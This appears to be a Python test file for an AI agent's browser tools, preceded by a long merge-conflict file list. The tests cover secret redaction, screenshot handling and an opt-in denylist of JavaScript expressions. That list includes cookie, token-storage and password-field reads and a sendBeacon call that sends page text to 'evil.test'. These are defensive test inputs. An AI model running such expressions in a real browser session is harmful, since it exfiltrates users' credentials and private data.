# Conflicts: # apps/desktop/e2e/archived-hidden-session-recoverable.spec.ts # apps/desktop/e2e/bot-chat-message-agent-friendly-name.spec.ts # apps/desktop/e2e/bot-mailbox-unreadable-ticket.spec.ts # apps/desktop/e2e/bot-mode-roster-localized.spec.ts # apps/desktop/e2e/bot-mode-row-click-mirrors-registry.spec.ts # apps/desktop/e2e/bot-mode-tab-shows-bot-name.spec.ts # apps/desktop/e2e/bot-roster-group-row-organisation.spec.ts # apps/desktop/e2e/bot-roster-ignores-infra-dirs.spec.ts # apps/desktop/e2e/bot-roster-timestamp-meta.spec.ts # apps/desktop/e2e/bot-roster-user-sections.spec.ts # apps/desktop/e2e/bot-routines-pane-narrow.spec.ts # apps/desktop/e2e/bot-row-open-recent-session.spec.ts # apps/desktop/e2e/bot-tile-ignores-ambient-composer-model.spec.ts # apps/desktop/e2e/group-composer-auto-grow.spec.ts # apps/desktop/e2e/group-create-gate-remote-roster.spec.ts # apps/desktop/e2e/group-prompt-renamed-primary-handle.spec.ts # apps/desktop/e2e/hosted-room-backend-continuity.spec.ts # apps/desktop/e2e/hosted-room-legacy-store-migration.spec.ts # apps/desktop/e2e/settings-scope-chips-bot-title.spec.ts # apps/desktop/e2e/worktree-branch-status.spec.ts # apps/desktop/electron/backend-probes.test.ts # apps/desktop/electron/connection-apply.test.ts # apps/desktop/electron/desktop-electron-pin.test.ts # apps/desktop/electron/desktop-uninstall.test.ts # apps/desktop/electron/gateway-file-download-transport.test.ts # apps/desktop/electron/gateway-stop-before-update.test.ts # apps/desktop/electron/github-api-auth.test.ts # apps/desktop/electron/registry-primary-profile-scope.test.ts # apps/desktop/electron/update-api-check.test.ts # apps/desktop/electron/update-handoff-marker.test.ts # apps/desktop/electron/venv-blocker-scan.test.ts # apps/desktop/scripts/after-extract.test.mjs # apps/desktop/scripts/local-pack-publish.test.mjs # apps/desktop/scripts/tasks-scroll.test.mjs # apps/desktop/src/app/settings/model-settings.test.tsx # apps/desktop/src/app/updates-overlay.blockers.test.tsx # apps/desktop/src/components/desktop-install-overlay.test.tsx # apps/desktop/src/lib/update-copy.test.ts # scripts/ci/check_os_marker_fakes.py # tests-js/desktop-mac-usage-descriptions.test.ts # tests-js/node-engine-alignment.test.ts # tests/agent/lsp/test_install_and_lint_fixes.py # tests/agent/test_command_token_source.py # tests/agent/test_compression_boundary_hook.py # tests/agent/test_create_openai_client_ssl_verify.py # tests/agent/test_custom_provider_ca_probes.py # tests/agent/test_endpoint_blackhole.py # tests/agent/test_estimator_parity.py # tests/agent/test_in_place_compaction.py # tests/agent/test_moa_loop_mode.py # tests/agent/test_model_metadata.py # tests/agent/test_skill_session_platform_gate.py # tests/agent/test_skill_utils.py # tests/agent/test_ssl_ca_guard.py # tests/computer_use/test_doctor.py # tests/cron/test_codex_execution_paths.py # tests/cron/test_cron_bot_chat_delivery.py # tests/cron/test_cron_script.py # tests/cron/test_media_delivery_parity.py # tests/cron/test_misfire_catchup.py # tests/cron/test_parallel_pool.py # tests/cron/test_recurring_eagain_redispatch.py # tests/gateway/test_choice_picker.py # tests/gateway/test_control_socket_windows_live.py # tests/gateway/test_dingtalk.py # tests/gateway/test_feishu.py # tests/gateway/test_feishu_onboard.py # tests/gateway/test_gateway_shutdown.py # tests/gateway/test_matrix.py # tests/gateway/test_model_command_custom_providers.py # tests/gateway/test_reasoning_command.py # tests/gateway/test_runtime_footer.py # tests/gateway/test_session.py # tests/gateway/test_session_hygiene.py # tests/gateway/test_status.py # tests/gateway/test_teams.py # tests/gateway/test_turn_lease.py # tests/gateway/test_whatsapp_connect.py # tests/hermes_cli/test_approvals_command.py # tests/hermes_cli/test_auth_store_lock_concurrent.py # tests/hermes_cli/test_backup.py # tests/hermes_cli/test_banner_git_state.py # tests/hermes_cli/test_certifi_repair.py # tests/hermes_cli/test_cmd_update.py # tests/hermes_cli/test_compat_manifest_targets.py # tests/hermes_cli/test_computer_use_cli.py # tests/hermes_cli/test_cpr_local_leak.py # tests/hermes_cli/test_dashboard_auth_gate.py # tests/hermes_cli/test_dashboard_procs_kill_grace.py # tests/hermes_cli/test_desktop_lifecycle_windows_live.py # tests/hermes_cli/test_doctor.py # tests/hermes_cli/test_doctor_command_install.py # tests/hermes_cli/test_fleet_config_migration_windows_live.py # tests/hermes_cli/test_gateway.py # tests/hermes_cli/test_gateway_platform_gating.py # tests/hermes_cli/test_gateway_restart_loop.py # tests/hermes_cli/test_gateway_task_probe.py # tests/hermes_cli/test_gateway_wsl.py # tests/hermes_cli/test_gui_command.py # tests/hermes_cli/test_install_cua_driver.py # tests/hermes_cli/test_kanban_db.py # tests/hermes_cli/test_lazy_command_exports.py # tests/hermes_cli/test_lazy_refresh_venv_repair.py # tests/hermes_cli/test_linux_desktop_entry.py # tests/hermes_cli/test_local_runtime.py # tests/hermes_cli/test_local_runtime_updates.py # tests/hermes_cli/test_managed_uv.py # tests/hermes_cli/test_mcp_reload_confirm_gate.py # tests/hermes_cli/test_nous_subscription.py # tests/hermes_cli/test_npm_engine.py # tests/hermes_cli/test_personality_none.py # tests/hermes_cli/test_pet_toggle.py # tests/hermes_cli/test_plan_reconciliation_windows_live.py # tests/hermes_cli/test_plugin_event_bus.py # tests/hermes_cli/test_plugin_manifest_v2.py # tests/hermes_cli/test_plugin_packs.py # tests/hermes_cli/test_plugins_cmd.py # tests/hermes_cli/test_plugins_cmd_enable_disable_nested.py # tests/hermes_cli/test_process_identity.py # tests/hermes_cli/test_profiles.py # tests/hermes_cli/test_profiles_sidebar_cache.py # tests/hermes_cli/test_pty_bridge.py # tests/hermes_cli/test_resolve_turn_limit.py # tests/hermes_cli/test_serve_runtime_inventory.py # tests/hermes_cli/test_session_vacuum_config.py # tests/hermes_cli/test_set_config_value.py # tests/hermes_cli/test_signal_handler_kanban_worker.py # tests/hermes_cli/test_slash_confirm_windows.py # tests/hermes_cli/test_stale_pid_guard.py # tests/hermes_cli/test_startup_fast_guards.py # tests/hermes_cli/test_status.py # tests/hermes_cli/test_telegram_managed_bot.py # tests/hermes_cli/test_tools_config.py # tests/hermes_cli/test_update_apply_shallow_count.py # tests/hermes_cli/test_update_autostash.py # tests/hermes_cli/test_update_concurrent_quarantine.py # tests/hermes_cli/test_update_fetch_failure_classifier.py # tests/hermes_cli/test_update_fleet_probe_resume_token.py # tests/hermes_cli/test_update_handoff_backend_reap.py # tests/hermes_cli/test_update_handoff_desktop_rebuild.py # tests/hermes_cli/test_update_head_moved_gate.py # tests/hermes_cli/test_update_host_obligation.py # tests/hermes_cli/test_update_import_guard.py # tests/hermes_cli/test_update_interrupted_recovery.py # tests/hermes_cli/test_update_inventory.py # tests/hermes_cli/test_update_launchd_unloaded_gateway.py # tests/hermes_cli/test_update_missing_configured_deps.py # tests/hermes_cli/test_update_modified_notice.py # tests/hermes_cli/test_update_multiplex_migration_hook.py # tests/hermes_cli/test_update_no_gateway_restart.py # tests/hermes_cli/test_update_orphan_backend_reap.py # tests/hermes_cli/test_update_parked_branch_guard.py # tests/hermes_cli/test_update_post_pull_syntax_guard.py # tests/hermes_cli/test_update_receipt.py # tests/hermes_cli/test_update_self_lock.py # tests/hermes_cli/test_update_shim_fail_closed.py # tests/hermes_cli/test_update_shim_self_lock.py # tests/hermes_cli/test_update_sqlite_remediation.py # tests/hermes_cli/test_update_stale_dashboard.py # tests/hermes_cli/test_update_stale_virtualenv.py # tests/hermes_cli/test_update_venv_health.py # tests/hermes_cli/test_update_venv_ownership_preflight.py # tests/hermes_cli/test_update_wedged_gateway.py # tests/hermes_cli/test_update_yes_flag.py # tests/hermes_cli/test_update_zip_two_phase.py # tests/hermes_cli/test_urllib_security.py # tests/hermes_cli/test_ux_messages_auth_config.py # tests/hermes_cli/test_ux_messages_startup.py # tests/hermes_cli/test_venv_holder_classifier.py # tests/hermes_cli/test_verify_console_scripts.py # tests/hermes_cli/test_verify_core_dependencies.py # tests/hermes_cli/test_web_server.py # tests/hermes_cli/test_web_server_console_ws.py # tests/hermes_cli/test_web_server_ws_ping.py # tests/hermes_cli/test_web_ui_build.py # tests/hermes_state/test_fts_rebuild_admission.py # tests/hermes_state/test_hermes_state.py # tests/plugins/memory/test_memory_lazy_install.py # tests/plugins/test_google_meet_plugin.py # tests/plugins/test_langfuse_plugin.py # tests/plugins/test_security_guidance_plugin.py # tests/plugins/test_transform_llm_output_hook.py # tests/scripts/desktop_update/test_desktop_update_windows_gateway_flag.py # tests/scripts/desktop_update/test_desktop_update_windows_python_handoff.py # tests/scripts/desktop_update/test_desktop_update_windows_timestamp.py # tests/scripts/install/test_install_clone_throttle_fallback.py # tests/scripts/install/test_install_lockfile_churn.py # tests/scripts/install/test_install_no_initial_commit.py # tests/scripts/install/test_install_sh_browser_install.py # tests/scripts/install/test_install_sh_node_prerelease.py # tests/scripts/install/test_install_sh_symlink_stomp.py # tests/scripts/install/test_install_sh_uv_lock_config.py # tests/scripts/install/test_install_unmerged_index.py # tests/scripts/test_contributor_map.py # tests/scripts/test_run_tests_parallel.py # tests/skills/test_competitor_news_monitor_skill.py # tests/skills/test_document_to_action_items_skill.py # tests/skills/test_google_workspace_setup.py # tests/skills/test_google_workspace_setup_deps.py # tests/skills/test_grounded_citations_skill.py # tests/skills/test_ip_as_logo_skill.py # tests/skills/test_live_dashboard_skill.py # tests/skills/test_mcp_oauth_remote_gateway_skill.py # tests/skills/test_office_document_skills.py # tests/skills/test_openclaw_migration.py # tests/skills/test_product_price_monitor_skill.py # tests/skills/test_scrollcraft_skill.py # tests/skills/test_setup_wizard_generator_skill.py # tests/skills/test_weekly_review_planning_skill.py # tests/test_engines_satisfiable.py # tests/test_fast_safe_load.py # tests/test_hermes_bootstrap.py # tests/test_hermes_constants.py # tests/test_hermes_logging.py # tests/test_managed_runtime_resolution.py # tests/test_model_tools_async_bridge.py # tests/test_packaging_build_guard.py # tests/test_packaging_metadata.py # tests/test_yaml_indent_consistency.py # tests/tools/test_approval_timeout_overflow.py # tests/tools/test_base_environment.py # tests/tools/test_bot_mode_dm.py # tests/tools/test_browser_chromium_check.py # tests/tools/test_browser_hardening.py # tests/tools/test_browser_homebrew_paths.py # tests/tools/test_browser_npx_warmup.py # tests/tools/test_browser_orphan_reaper.py # tests/tools/test_browser_real_profile.py # tests/tools/test_browser_use_cli.py # tests/tools/test_clipboard.py # tests/tools/test_code_execution.py # tests/tools/test_code_execution_modes.py # tests/tools/test_code_execution_windows_env.py # tests/tools/test_computer_use.py # tests/tools/test_delegate_liveness_timeout.py # tests/tools/test_execute_code_approval_cluster.py # tests/tools/test_execution_flag_detection.py # tests/tools/test_fal_common.py # tests/tools/test_file_operations.py # tests/tools/test_file_tools.py # tests/tools/test_file_tools_cwd_resolution.py # tests/tools/test_file_tools_live.py # tests/tools/test_lazy_deps.py # tests/tools/test_lazy_deps_durable_target.py # tests/tools/test_lazy_deps_managed.py # tests/tools/test_local_env_blocklist.py # tests/tools/test_local_tempdir.py # tests/tools/test_macos_protected_search.py # tests/tools/test_mcp_npx_cached_bin.py # tests/tools/test_oneshot_completion_linger.py # tests/tools/test_process_registry.py # tests/tools/test_read_file_schema_gating.py # tests/tools/test_skill_improvements.py # tests/tools/test_skills_sync.py # tests/tools/test_termux_api_detection.py # tests/tools/test_tirith_security.py # tests/tools/test_transcription_tools.py # tests/tools/test_tts_streaming.py # tests/tools/test_wake_word.py # tests/tui_gateway/test_compute_host_borrowed_lease.py # tests/tui_gateway/test_compute_host_turn_protocol.py # tests/tui_gateway/test_isolated_orphan_activity.py # tests/tui_gateway/test_protocol.py # tests/tui_gateway/test_slash_worker_profile_home.py # tests/tui_gateway/test_subprocess_encoding.py # tests/tui_gateway/test_tui_gateway_server.py # ui-tui/src/__tests__/terminalParity.test.ts # ui-tui/src/__tests__/termuxComposerLayout.test.ts # ui-tui/src/__tests__/textInputFastEcho.test.ts
339 lines
16 KiB
Python
339 lines
16 KiB
Python
"""Tests for browser_console tool and browser_vision annotate param."""
|
|
|
|
import json
|
|
import os
|
|
import sys
|
|
from unittest.mock import patch, MagicMock
|
|
|
|
import pytest
|
|
|
|
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
|
|
|
|
# ── browser_console ──────────────────────────────────────────────────
|
|
|
|
class TestBrowserConsole:
|
|
"""browser_console() returns console messages + JS errors in one call."""
|
|
|
|
def test_returns_console_messages_and_errors(self):
|
|
from tools.browser_tool import browser_console
|
|
|
|
console_response = {
|
|
"success": True,
|
|
"data": {
|
|
"messages": [
|
|
{"text": "hello", "type": "log", "timestamp": 1},
|
|
{"text": "oops", "type": "error", "timestamp": 2},
|
|
]
|
|
},
|
|
}
|
|
errors_response = {
|
|
"success": True,
|
|
"data": {
|
|
"errors": [
|
|
{"message": "Uncaught TypeError", "timestamp": 3},
|
|
]
|
|
},
|
|
}
|
|
|
|
with patch("tools.browser_tool_session._run_browser_command") as mock_cmd:
|
|
mock_cmd.side_effect = [console_response, errors_response]
|
|
result = json.loads(browser_console(task_id="test"))
|
|
|
|
assert result["success"] is True
|
|
assert result["total_messages"] == 2
|
|
assert result["total_errors"] == 1
|
|
assert result["console_messages"][0]["text"] == "hello"
|
|
assert result["console_messages"][1]["text"] == "oops"
|
|
assert result["js_errors"][0]["message"] == "Uncaught TypeError"
|
|
|
|
def test_redacts_secrets_from_console_messages_and_errors(self):
|
|
from tools.browser_tool import browser_console
|
|
|
|
fake_key = "sk-" + "BROWSERCONSOLESECRET1234567890"
|
|
console_response = {
|
|
"success": True,
|
|
"data": {"messages": [{"text": f"token={fake_key}", "type": "log"}]},
|
|
}
|
|
errors_response = {
|
|
"success": True,
|
|
"data": {"errors": [{"message": f"Uncaught auth {fake_key}"}]},
|
|
}
|
|
with patch("tools.browser_tool_session._run_browser_command") as mock_cmd:
|
|
mock_cmd.side_effect = [console_response, errors_response]
|
|
result = json.loads(browser_console(task_id="test"))
|
|
|
|
serialized = json.dumps(result)
|
|
# The secret body must be gone. The exact mask format
|
|
# (partial ``sk-…7890`` vs full ``***`` for keyed ``token=`` values)
|
|
# is owned by agent.redact and intentionally not pinned here.
|
|
assert "BROWSERCONSOLESECRET" not in serialized
|
|
redacted_text = result["console_messages"][0]["text"]
|
|
assert fake_key not in redacted_text
|
|
assert "***" in redacted_text or "..." in redacted_text
|
|
|
|
def test_redacts_secrets_from_eval_result(self):
|
|
from tools.browser_tool import _browser_eval
|
|
|
|
fake_key = "ghp_" + "BROWSEREVALSECRET1234567890"
|
|
with patch("tools.browser_tool._last_session_key", return_value="test"), \
|
|
patch("tools.browser_tool._is_camofox_mode", return_value=False), \
|
|
patch("tools.browser_tool_session._run_browser_command", return_value={"success": True, "data": {"result": fake_key}}):
|
|
result = json.loads(_browser_eval("document.body.innerText", task_id="test"))
|
|
|
|
assert result["success"] is True
|
|
assert "BROWSEREVALSECRET" not in json.dumps(result)
|
|
assert result["result"].startswith("ghp_")
|
|
|
|
def test_expression_allows_risky_eval_by_default(self):
|
|
"""The sensitive-primitive denylist is opt-in — default config runs everything.
|
|
|
|
The names-based denylist blocked legitimate DOM extraction (any selector
|
|
or expression containing 'fetch'/'cookie'/'input' etc.), so it is off
|
|
unless browser.restrict_evaluate is set. Egress to private addresses is
|
|
still guarded separately in _browser_eval.
|
|
"""
|
|
from tools.browser_tool import browser_console
|
|
|
|
expressions = [
|
|
"document.cookie",
|
|
"fetch('/api/me')",
|
|
"localStorage.getItem('token')",
|
|
"document.querySelector('input[type=password]').value",
|
|
"document.querySelector('#fetch-results').innerText",
|
|
]
|
|
with patch("tools.browser_tool._browser_eval", return_value=json.dumps({"success": True, "result": "ok"})) as mock_eval:
|
|
for expr in expressions:
|
|
result = json.loads(browser_console(expression=expr, task_id="test"))
|
|
assert result == {"success": True, "result": "ok"}, expr
|
|
|
|
assert mock_eval.call_count == len(expressions)
|
|
|
|
def test_expression_blocks_cookie_access_before_eval(self):
|
|
from tools.browser_tool import browser_console
|
|
|
|
with patch("tools.browser_tool_eval_policy._restrict_browser_evaluate", return_value=True), \
|
|
patch("tools.browser_tool_eval_policy._allow_unsafe_browser_evaluate", return_value=False), \
|
|
patch("tools.browser_tool._browser_eval") as mock_eval:
|
|
result = json.loads(browser_console(expression="document.cookie", task_id="test"))
|
|
|
|
assert result["success"] is False
|
|
assert "Blocked" in result["error"]
|
|
assert "document.cookie" in result["error"]
|
|
mock_eval.assert_not_called()
|
|
|
|
def test_expression_blocks_storage_and_network_access_before_eval(self):
|
|
from tools.browser_tool import browser_console
|
|
|
|
risky_expressions = [
|
|
"localStorage.getItem('token')",
|
|
"sessionStorage.token",
|
|
"indexedDB.databases()",
|
|
"navigator.clipboard.readText()",
|
|
"fetch('/api/me')",
|
|
"navigator.sendBeacon('https://evil.test', document.body.innerText)",
|
|
"document.querySelector('input[type=password]').value",
|
|
]
|
|
with patch("tools.browser_tool_eval_policy._restrict_browser_evaluate", return_value=True), \
|
|
patch("tools.browser_tool_eval_policy._allow_unsafe_browser_evaluate", return_value=False), \
|
|
patch("tools.browser_tool._browser_eval") as mock_eval:
|
|
for expr in risky_expressions:
|
|
result = json.loads(browser_console(expression=expr, task_id="test"))
|
|
assert result["success"] is False, expr
|
|
assert "Blocked" in result["error"], expr
|
|
|
|
mock_eval.assert_not_called()
|
|
|
|
def test_restrict_evaluate_reads_browser_config(self):
|
|
from tools.browser_tool_eval_policy import _restrict_browser_evaluate
|
|
|
|
with patch("hermes_cli.config.read_raw_config", return_value={"browser": {"restrict_evaluate": "true"}}):
|
|
assert _restrict_browser_evaluate() is True
|
|
with patch("hermes_cli.config.read_raw_config", return_value={"browser": {"restrict_evaluate": False}}):
|
|
assert _restrict_browser_evaluate() is False
|
|
# Default (key absent) is off — the denylist is opt-in.
|
|
with patch("hermes_cli.config.read_raw_config", return_value={}):
|
|
assert _restrict_browser_evaluate() is False
|
|
|
|
# ── browser_console schema ───────────────────────────────────────────
|
|
|
|
# ── browser_vision annotate ──────────────────────────────────────────
|
|
|
|
class TestBrowserVisionConfig:
|
|
def _setup_screenshot(self, tmp_path):
|
|
shots_dir = tmp_path / "browser_screenshots"
|
|
shots_dir.mkdir()
|
|
screenshot = shots_dir / "shot.png"
|
|
screenshot.write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)
|
|
return shots_dir, screenshot
|
|
|
|
def test_browser_vision_uses_configured_temperature_and_timeout(self, tmp_path):
|
|
from tools.browser_tool import browser_vision
|
|
|
|
shots_dir, screenshot = self._setup_screenshot(tmp_path)
|
|
mock_response = MagicMock()
|
|
mock_choice = MagicMock()
|
|
mock_choice.message.content = "Annotated screenshot analysis"
|
|
mock_response.choices = [mock_choice]
|
|
|
|
with (
|
|
patch("hermes_constants.get_hermes_dir", return_value=shots_dir),
|
|
patch("tools.browser_tool_lifecycle._cleanup_old_screenshots"),
|
|
patch("tools.browser_tool_session._run_browser_command", return_value={"success": True, "data": {"path": str(screenshot)}}),
|
|
patch("tools.browser_tool._get_vision_model", return_value="test-model"),
|
|
patch("hermes_cli.config.load_config", return_value={"auxiliary": {"vision": {"temperature": 1, "timeout": 45}}}),
|
|
patch("agent.auxiliary_client.call_llm", return_value=mock_response) as mock_llm,
|
|
):
|
|
result = json.loads(browser_vision("what is on the page?", task_id="test"))
|
|
|
|
assert result["success"] is True
|
|
assert result["analysis"] == "Annotated screenshot analysis"
|
|
assert mock_llm.call_args.kwargs["temperature"] == 1.0
|
|
assert mock_llm.call_args.kwargs["timeout"] == 45.0
|
|
# No hardcoded output cap — the aux client omits max_tokens so the
|
|
# provider uses its full output budget (max-tokens-knob policy).
|
|
assert "max_tokens" not in mock_llm.call_args.kwargs
|
|
|
|
def test_browser_vision_native_fast_path_returns_multimodal(self, tmp_path):
|
|
"""supports_vision override → screenshot attached natively, no aux call."""
|
|
from agent.auxiliary_client import clear_runtime_main, set_runtime_main
|
|
from tools.browser_tool import browser_vision
|
|
|
|
shots_dir, screenshot = self._setup_screenshot(tmp_path)
|
|
annotations = [{"id": 1, "label": "Search box"}]
|
|
set_runtime_main("brand-new-provider", "llava-v1.6")
|
|
try:
|
|
with (
|
|
patch("hermes_constants.get_hermes_dir", return_value=shots_dir),
|
|
patch("tools.browser_tool_lifecycle._cleanup_old_screenshots"),
|
|
patch(
|
|
"tools.browser_tool_session._run_browser_command",
|
|
return_value={
|
|
"success": True,
|
|
"data": {"path": str(screenshot), "annotations": annotations},
|
|
},
|
|
),
|
|
patch(
|
|
"hermes_cli.config.load_config",
|
|
return_value={"model": {"supports_vision": True}},
|
|
),
|
|
patch("tools.browser_tool._get_vision_model") as mock_get_vision_model,
|
|
patch("agent.auxiliary_client.call_llm") as mock_llm,
|
|
):
|
|
result = browser_vision("what is on the page?", annotate=True, task_id="test")
|
|
finally:
|
|
clear_runtime_main()
|
|
|
|
assert isinstance(result, dict)
|
|
assert result["_multimodal"] is True
|
|
assert result["meta"]["screenshot_path"] == str(screenshot)
|
|
assert result["meta"]["annotations"] == annotations
|
|
assert any(p.get("type") == "image_url" for p in result["content"])
|
|
assert f"Screenshot path: {screenshot}" in result["text_summary"]
|
|
mock_get_vision_model.assert_not_called()
|
|
mock_llm.assert_not_called()
|
|
|
|
def test_browser_vision_native_fast_path_caps_history_embed(self, tmp_path):
|
|
"""Oversized screenshots are resized before entering history (#92699).
|
|
|
|
browser_vision's native fast path bakes the data URL into the tool
|
|
result exactly like vision_analyze — without the proactive resize a
|
|
full-res screenshot rides every later request uncapped.
|
|
"""
|
|
pytest.importorskip("PIL")
|
|
import base64
|
|
from io import BytesIO
|
|
|
|
from PIL import Image
|
|
|
|
from agent.auxiliary_client import clear_runtime_main, set_runtime_main
|
|
from tools.browser_tool import browser_vision
|
|
from tools.vision_tools import _EMBED_MAX_DIMENSION
|
|
from tools.vision_tools_history_budget import _DEFAULT_EMBED_TARGET_BYTES as _EMBED_TARGET_BYTES
|
|
|
|
shots_dir = tmp_path / "browser_screenshots"
|
|
shots_dir.mkdir()
|
|
screenshot = shots_dir / "shot.png"
|
|
# Taller than the long-edge cap so the resize path must fire.
|
|
Image.new("RGB", (400, _EMBED_MAX_DIMENSION + 500), (0, 100, 0)).save(
|
|
screenshot, format="PNG"
|
|
)
|
|
|
|
set_runtime_main("brand-new-provider", "llava-v1.6")
|
|
try:
|
|
with (
|
|
patch("hermes_constants.get_hermes_dir", return_value=shots_dir),
|
|
patch("tools.browser_tool_lifecycle._cleanup_old_screenshots"),
|
|
patch(
|
|
"tools.browser_tool_session._run_browser_command",
|
|
return_value={
|
|
"success": True,
|
|
"data": {"path": str(screenshot)},
|
|
},
|
|
),
|
|
patch(
|
|
"hermes_cli.config.load_config",
|
|
return_value={"model": {"supports_vision": True}},
|
|
),
|
|
patch("agent.auxiliary_client.call_llm") as mock_llm,
|
|
):
|
|
result = browser_vision("what is on the page?", task_id="test")
|
|
finally:
|
|
clear_runtime_main()
|
|
|
|
assert isinstance(result, dict)
|
|
assert result["_multimodal"] is True
|
|
url = next(
|
|
p["image_url"]["url"]
|
|
for p in result["content"]
|
|
if p.get("type") == "image_url"
|
|
)
|
|
assert len(url) <= _EMBED_TARGET_BYTES, (
|
|
f"embedded browser screenshot {len(url) / 1024:.0f} KB exceeds the "
|
|
f"history-reuse cap {_EMBED_TARGET_BYTES / 1024:.0f} KB"
|
|
)
|
|
with Image.open(BytesIO(base64.b64decode(url.partition(",")[2]))) as img:
|
|
assert max(img.size) <= _EMBED_MAX_DIMENSION
|
|
mock_llm.assert_not_called()
|
|
|
|
def test_browser_vision_text_mode_blocks_native_fast_path(self, tmp_path):
|
|
"""Explicit text routing → aux LLM used even with supports_vision."""
|
|
from agent.auxiliary_client import clear_runtime_main, set_runtime_main
|
|
from tools.browser_tool import browser_vision
|
|
|
|
shots_dir, screenshot = self._setup_screenshot(tmp_path)
|
|
mock_response = MagicMock()
|
|
mock_choice = MagicMock()
|
|
mock_choice.message.content = "Text-mode screenshot analysis"
|
|
mock_response.choices = [mock_choice]
|
|
|
|
set_runtime_main("brand-new-provider", "llava-v1.6")
|
|
try:
|
|
with (
|
|
patch("hermes_constants.get_hermes_dir", return_value=shots_dir),
|
|
patch("tools.browser_tool_lifecycle._cleanup_old_screenshots"),
|
|
patch(
|
|
"tools.browser_tool_session._run_browser_command",
|
|
return_value={"success": True, "data": {"path": str(screenshot)}},
|
|
),
|
|
patch(
|
|
"hermes_cli.config.load_config",
|
|
return_value={
|
|
"agent": {"image_input_mode": "text"},
|
|
"model": {"supports_vision": True},
|
|
},
|
|
),
|
|
patch("tools.browser_tool._get_vision_model", return_value="test-model"),
|
|
patch("agent.auxiliary_client.call_llm", return_value=mock_response) as mock_llm,
|
|
):
|
|
result = json.loads(browser_vision("what is on the page?", task_id="test"))
|
|
finally:
|
|
clear_runtime_main()
|
|
|
|
assert result["success"] is True
|
|
assert result["analysis"] == "Text-mode screenshot analysis"
|
|
mock_llm.assert_called_once()
|
|
|
|
# ── auto-recording config ────────────────────────────────────────────
|
|
|
|
# ── dogfood skill files ──────────────────────────────────────────────
|